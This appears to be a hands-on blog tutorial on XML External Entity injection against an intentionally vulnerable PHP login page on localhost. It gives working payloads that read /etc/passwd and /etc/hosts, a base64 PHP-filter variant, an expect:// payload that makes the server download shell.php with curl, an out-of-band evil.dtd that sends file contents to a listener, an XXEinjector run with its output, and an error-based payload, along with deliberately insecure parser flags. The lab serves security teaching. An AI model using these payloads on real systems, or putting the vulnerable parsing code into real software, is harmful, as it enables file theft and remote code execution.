XML External Entity Injection (XXE)

XML External Entity Injection attacks allow for;

  • File retrieval
  • Server Side Request Forgery
  • Remote Code Execution (in a limited set of circumstances)

XML Entities

Entities are the elements that make up an XML document. For instance, in the following XML the text “user” between the less than and greater than symbols is an entity. The user entity is storing the value “admin”.

<?xml version="1.0" encoding="ISO-8859-1"?>
<user>admin</user>

The entity is considered internal, since it’s defined within the XML document.

External entities allow for referencing local or remote content outside of the original document structure. This is done using the SYSTEM identifier. In the following example, an external entity is defined pointing to an external document.

<!DOCTYPE html SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 

The document referenced in the above example is a Document Type Definition (DTD). A DTD specifies the structure, elements and attributes that are valid in an XML document.

Below is an example of a DTD. Elements user and password are defined with data types of PCDATA (parseable character data).

<!DOCTYPE creds
[
<!ELEMENT user (#PCDATA)>
<!ELEMENT password (#PCDATA)>
]>

Vulnerable Code

Here’s the PHP code we will be attempting to exploit (login.php). The code just accepts XML data via a post request, and parses the values it contains.

<?php 
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $user = $creds->user;
    $pass = $creds->pass;
    echo "You are logged in as: $user";
?> 

The LIBXML_NOENT flag allows for external entities, and LIBXML_DTDLOAD allows loading external Document Type Definitions.

Next, we just need some client side code to submit XML requests. This file is saved as index.html.

Username:<BR> <input id="myUsername" value="admin"><br><br>
Password:<BR> <input type="password" id="myPassword" value="admin"><br><br>

<button type="button" onclick="siteLogin()">Login</button>

<p id="loginStatus"></p>

<script>
function siteLogin() {

  var username = document.getElementById("myUsername").value;
  var password = document.getElementById("myPassword").value;

  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("loginStatus").innerHTML = this.responseText;
    }
  };
  xhttp.open("POST", "login.php", true);
  xhttp.setRequestHeader("Content-type", "application/xml");
  let data = `<?xml version="1.0" encoding="ISO-8859-1"?><creds><user>` + username + `</user><pass>` + password + `</pass></creds>`;
  xhttp.send(data);
}
</script>

To run this on Kali Linux, make sure php-xml is installed, and start a local PHP webserver;

sudo apt install php-xml
php -S 127.0.0.1:8000

Navigating to the site, you should get the following dialog.

We can intercept the login request using BurpSuite to see the XML data being transmitted.

POST /login.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/xml
Content-Length: 93
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

<?xml version="1.0" encoding="ISO-8859-1"?>
<creds>
<user>admin</user>
<pass>test</pass>
</creds>

Arbitrary File Retrieval

We can use the file:// URI handler to reference files stored on a server. In the below example, we define a new entity called “xxe“. This entity is then referenced in the XML using the specifier &xxe;

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds><user>&xxe;</user><pass>test</pass></creds>

Sending this request to the server will result in the contents of /etc/passwd being retrieved.

The contents of the password file is retrieved in the above example since the username field is returned in the XML response.


PHP Filters

If the content retrieved breaks the standard XML format, by including characters like lesser, or greater than (<>) you won’t get any results.

To get around this, PHP filters can be used similar to how they are utilised in LFI attacks to retrieve files as Base64 encoded strings.

<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=login.php" >]>

Command Execution

If the PHP expect wrapper is enabled on the server, you can execute commands using the relevant URI handler;

<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://curl$IFS-O$IFS'127.0.0.1:4000/shell.php'" >]>

Out of Band Data Retrieval

If the application does not provide an output in it’s response, it might be possible to retrieve information out of band.

To do this, first create a malicious DTD file (evil.dtd) referencing the file you want to retrieve;

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/hosts">
<!ENTITY % bordergate "<!ENTITY &#37; getfile SYSTEM 'http://127.0.0.1:5000/?p=%file;'>">

Then start a local web server to host the file;

python3 -m http.server 5000

Next, generate a HTTP request to the application referencing the DTD file;

POST /login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/xml
Content-Length: 149
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/
Cookie: PHPSESSID=u6eor6rkr18h79g3facjbimngl; showhints=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://127.0.0.1:5000/evil.dtd">%remote;%bordergate;%getfile;]>

You should receive the file back as a base64 encoded GET request that can be decoded;

python3 -m http.server 5000
Serving HTTP on 0.0.0.0 port 5000 (http://0.0.0.0:5000/) ...
127.0.0.1 - - [20/May/2023 09:56:01] "GET /evil.dtd HTTP/1.1" 200 -
127.0.0.1 - - [20/May/2023 09:56:01] "GET /?p=MTI3LjAuMC4xCWxvY2FsaG9zdAoxMjcuMC4xLjEJa2FsaQo6OjEJCWxvY2FsaG9zdCBpcDYtbG9jYWxob3N0IGlwNi1sb29wYmFjawpmZjAyOjoxCQlpcDYtYWxsbm9kZXMKZmYwMjo6MgkJaXA2LWFsbHJvdXRlcnMK HTTP/1.1" 200 -

echo MTI3LjAuMC4xCWxvY2FsaG9zdAoxMjcuMC4xLjEJa2FsaQo6OjEJCWxvY2FsaG9zdCBpcDYtbG9jYWxob3N0IGlwNi1sb29wYmFjawpmZjAyOjoxCQlpcDYtYWxsbm9kZXMKZmYwMjo6MgkJaXA2LWFsbHJvdXRlcnMK | base64 -d
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

Automated Out of Band Data Retrieval

XXEInjector can be used to perform automated out of band data retrieval. First copy the HTTP request to a file, removing the XML data and adding in a marker to be injected into (XXEINJECT):

POST /login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/xml
Content-Length: 206
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/
Cookie: PHPSESSID=u6eor6rkr18h79g3facjbimngl; showhints=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT

Then run the tool referencing the HTTP request we captured;

ruby XXEinjector.rb --host=127.0.0.1 --httpport=6000 --file=/home/kali/request.txt --path=/etc/hosts --verbose --oob=http --phpfilter
XXEinjector by Jakub Pałaczyński

Enumeration options:
"y" - enumerate currect file (default)
"n" - skip currect file
"a" - enumerate all files in currect directory
"s" - skip all files in currect directory
"q" - quit

[-] Multiple instances of XML found. It may results in false-positives.
[+] Sending request with malicious XML:
http://127.0.0.1:80/login.php
{"User-Agent"=>"Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0", "Accept"=>"*/*", "Accept-Language"=>"en-US,en;q=0.5", "Accept-Encoding"=>"gzip, deflate", "Content-type"=>"application/xml", "Content-Length"=>"240", "Origin"=>"http://127.0.0.1", "Connection"=>"close", "Referer"=>"http://127.0.0.1/", "Cookie"=>"PHPSESSID=u6eor6rkr18h79g3facjbimngl; showhints=1", "Sec-Fetch-Dest"=>"empty", "Sec-Fetch-Mode"=>"cors", "Sec-Fetch-Site"=>"same-origin"}

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://127.0.0.1:6000/file.dtd">%remote;%int;%trick;]>
<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://127.0.0.1:6000/file.dtd">%remote;%int;%trick;]>

[+] Got request for XML:
GET /file.dtd HTTP/1.1

[+] Responding with XML for: /etc/hosts
[+] XML payload sent:
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/hosts">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://127.0.0.1:6000/?p=%payl;'>">

[+] Response with file/directory content received:
GET /?p=MTI3LjAuMC4xCWxvY2FsaG9zdAoxMjcuMC4xLjEJa2FsaQo6OjEJCWxvY2FsaG9zdCBpcDYtbG9jYWxob3N0IGlwNi1sb29wYmFjawpmZjAyOjoxCQlpcDYtYWxsbm9kZXMKZmYwMjo6MgkJaXA2LWFsbHJvdXRlcnMK HTTP/1.1

[+] Retrieved data:
[+] Nothing else to do. Exiting.                                                                        
                                                                                                                                             
┌──(kali㉿kali)-[~/XXEinjector]
└─$ echo MTI3LjAuMC4xCWxvY2FsaG9zdAoxMjcuMC4xLjEJa2FsaQo6OjEJCWxvY2FsaG9zdCBpcDYtbG9jYWxob3N0IGlwNi1sb29wYmFjawpmZjAyOjoxCQlpcDYtYWxsbm9kZXMKZmYwMjo6MgkJaXA2LWFsbHJvdXRlcnMK | base64 -d
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters


Error Based File Retrieval

If we modify our PHP code to include error messages, an attacker may be able to view the contents of files by triggering an error condition;

<?php 
    ini_set('display_errors', 1);
    ini_set('display_startup_errors', 1);
    error_reporting(E_ALL);

    libxml_disable_entity_loader (false); 
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $user = $creds->user;
    $pass = $creds->pass;
    echo "You are logged in as: $user";
?> 

In the below XML, we’re requesting a DTD that exists on the server, and specifying a entity that will not load (via file:///nonexistent). This will result in an error message showing the contents of the file being printed.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/hosts">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<creds><user>&local_dtd</user><pass>test</pass></creds>

This particular technique was first documented in this blog post.

In Conclusion

Most modern XML parsers disable external entity parsing by default, however in 2023 these vulnerabilities are still being reported.